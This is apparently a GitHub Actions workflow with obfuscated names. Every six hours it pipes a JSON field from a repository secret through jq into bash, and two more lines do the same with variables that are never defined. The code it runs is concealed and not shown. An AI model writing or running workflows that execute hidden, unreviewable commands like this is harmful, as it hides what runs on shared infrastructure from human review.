name: wanxuantong7846

on:
  workflow_dispatch:
  schedule:
    - cron: '15 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wanxuantong7846
        env:
          p1: ${{ secrets.p1 }}
        run: |
          echo $p1 | jq -r .ivhd7 | /bin/bash
          echo $kp9 | jq -r .fku1733 | /bin/bash
          echo $rvipg1443 | jq -r .gish7 | /bin/bash

